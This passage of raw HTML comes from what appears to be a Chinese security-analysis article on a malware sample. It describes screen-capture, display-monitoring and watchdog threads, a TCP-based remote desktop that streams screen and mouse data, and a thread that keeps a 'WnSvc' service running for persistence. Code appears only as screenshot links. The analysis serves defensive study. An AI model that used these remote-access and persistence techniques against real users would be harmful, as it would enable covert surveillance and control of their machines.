src="https://wechat2rss.xlab.app/img-proxy/?k=517d1597&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlXeEBZM1Al6icQLzEtXjWPxw3nWqNheRAtibwyfAH63SR9ubK6ibMcoriaQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图28 像素帧比对</span></span></p><p><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0); font-size: 17px; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal;&#34;,&#34;data-pm-slice&#34;:&#34;2 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;p\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;margin-bottom: 24px;margin-top: 24px;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;span\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \\\&#34;Helvetica Neue\\\&#34;, \\\&#34;PingFang SC\\\&#34;, \\\&#34;Hiragino Sans GB\\\&#34;, \\\&#34;Microsoft YaHei UI\\\&#34;, \\\&#34;Microsoft YaHei\\\&#34;, Arial, sans-serif;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;strong\&#34;,\&#34;attributes\&#34;:{},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.2.2）</span><span leaf="">线程(2)-监控显示器配置变化</span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">线程(2)主要用来于动态检测显示器配置变化。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023907" data-ratio="0.4982658959537572" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=f8b44f27&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGla5LqUy85Lkr8TMhgsBnt6dXzv10K03xnrXMibKvyPibP5GRnUt6icILQQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图29 日志记录</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023908" data-ratio="0.2751445086705202" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=c02a5240&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlyaPYb8rwXvScSrLicDDAiajtyv5vpMolUKHKLzOQD8ictb7Kl4LaOwCvA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图30 获取显示器信息</span></span></p><p><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0); font-size: 17px; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal;&#34;,&#34;data-pm-slice&#34;:&#34;2 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;p\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;margin-bottom: 24px;margin-top: 24px;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;span\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \\\&#34;Helvetica Neue\\\&#34;, \\\&#34;PingFang SC\\\&#34;, \\\&#34;Hiragino Sans GB\\\&#34;, \\\&#34;Microsoft YaHei UI\\\&#34;, \\\&#34;Microsoft YaHei\\\&#34;, Arial, sans-serif;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;strong\&#34;,\&#34;attributes\&#34;:{},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.2.3）</span><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="">线程(3)- 看门狗线程</span></span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">线程(3)是一个Watchdog线程，用来守护线程(1)-屏幕捕获线程。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023909" data-ratio="0.5919075144508671" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=e4c45639&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlqicwGtaJVVLAL6dRG5okw3fC5GdXFiadyibAQVwErn27OkoQwI42jiay0g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图31 看门狗线程</span></span></p><p><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 3 [&#34;para&#34;,null,&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0); font-size: 17px; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal;&#34;,&#34;data-pm-slice&#34;:&#34;2 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;p\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;margin-bottom: 24px;margin-top: 24px;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;span\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \\\&#34;Helvetica Neue\\\&#34;, \\\&#34;PingFang SC\\\&#34;, \\\&#34;Hiragino Sans GB\\\&#34;, \\\&#34;Microsoft YaHei UI\\\&#34;, \\\&#34;Microsoft YaHei\\\&#34;, Arial, sans-serif;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;strong\&#34;,\&#34;attributes\&#34;:{},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.1.3）</span><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="">功能3-开启远程桌面</span></span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">功能3首先创建一个监听指定端口的TCP服务器，接受客户端连接，并为每个连接创建一个新线程来处理后续的通信任务。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023910" data-ratio="0.5699421965317919" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=5954cb57&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlB59zP0TAgbsSNPF8GFcRCzewRwDgWQD3J7VKhn8J0Bl1yGIvxCDC7Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图32 创建服务器</span></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">新线程主要实现了一个远程桌面功能。服务端不断从客户端接收字符“R”，然后获取鼠标信息和屏幕信息发送给客户端。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023911" data-ratio="0.2751445086705202" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=f71ae061&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlebBNadeDD4FuZWd4IibgXM1sgUBk8TP31bURtSiaj9ssrczT8XcOzRvA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图33 循环接收字符R</span></span></p><p><span leaf=""><img data-imgfileid="100023912" class="rich_pages wxw-img" data-ratio="0.40809248554913297" data-type="png" data-w="865" src="https://wechat2rss.xlab.app/img-proxy/?k=b4674fe4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlGPchd4T6voOCXqe9rBhp5uXNUZ5sSMjOrMqxV42iarUaIeWsTqibxWvg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图34 鼠标信息采集</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023913" data-ratio="0.3988439306358382" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=69ef68de&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlxhl732E9G2VVYr3l7BXfBklWbNJoia6v3hwVnzCEO9dOYCaDHQRmibfQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图35 发送共享内存中的屏幕数据</span></span></p><div data-role="outer" label="edit by 135editor"><div data-role="outer" label="Powered by 135editor.com" data-pm-slice="4 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-role&#34;:&#34;outer&#34;,&#34;label&#34;:&#34;edit by 135editor&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><p style="letter-spacing: 0.578px;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">我们构建了一个客户端，连接服务端后实现了远程桌面。</span></span></p></div></div><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023914" data-ratio="0.6739884393063584" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7a8befde&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGlT2DlSKuTOEhWxiaf97y59OyKnGAAk6IOjMfSMRsEwVCyjibV7yAX9rJA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图36 远程桌面示例</span></span></p><p><span style="color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><strong><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 3 [&#34;para&#34;,null,&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0); font-size: 17px; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; font-variant-position: normal;&#34;,&#34;data-pm-slice&#34;:&#34;2 2 [\&#34;para\&#34;,{\&#34;tagName\&#34;:\&#34;p\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;margin-bottom: 24px;margin-top: 24px;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;span\&#34;,\&#34;attributes\&#34;:{\&#34;style\&#34;:\&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \\\&#34;Helvetica Neue\\\&#34;, \\\&#34;PingFang SC\\\&#34;, \\\&#34;Hiragino Sans GB\\\&#34;, \\\&#34;Microsoft YaHei UI\\\&#34;, \\\&#34;Microsoft YaHei\\\&#34;, Arial, sans-serif;\&#34;},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;},\&#34;node\&#34;,{\&#34;tagName\&#34;:\&#34;strong\&#34;,\&#34;attributes\&#34;:{},\&#34;namespaceURI\&#34;:\&#34;http://www.w3.org/1999/xhtml\&#34;}]&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]">2.3.2.2）</span><span style="color: rgb(0, 0, 0);font-size: 17px;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;" data-pm-slice="2 2 [&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;margin-bottom: 24px;margin-top: 24px;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;span&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;color: rgb(0, 0, 0);font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, \&#34;Helvetica Neue\&#34;, \&#34;PingFang SC\&#34;, \&#34;Hiragino Sans GB\&#34;, \&#34;Microsoft YaHei UI\&#34;, \&#34;Microsoft YaHei\&#34;, Arial, sans-serif;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;strong&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span leaf="">线程2-守护线程</span></span></span></strong></span></p><p style="letter-spacing: 0.578px;text-wrap: wrap;text-indent: 2em;line-height: 1.6em;margin-bottom: 24px;margin-top: 24px;"><span style="letter-spacing: 0.578px;text-indent: 37.3333px;font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span leaf="">线程2主要是守护“WnSvc”服务，确保名为WnSvc的Windows服务始终处于运行状态。如果该服务未运行，它会尝试启动或安装它。</span></span></p><p><span leaf=""><img class="rich_pages wxw-img" data-imgfileid="100023915" data-ratio="0.5780346820809249" data-w="865" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=2d04dca6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F6CNEHNicic4Pp1goxlUiaefg6lWwuby4CGldoanpSXbSxBXjJLN8vpwnrKuwdg471ZYWblM14g8jUvhuyicItSCBcw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p style="text-align: center;"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">图37 持久化守护服务线程</span></span></p><p style="margin-top: 24px;margin-bottom: 24px;letter-spacing: 0.578px;text-wrap: wrap;"><span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-pm-slice="5 4 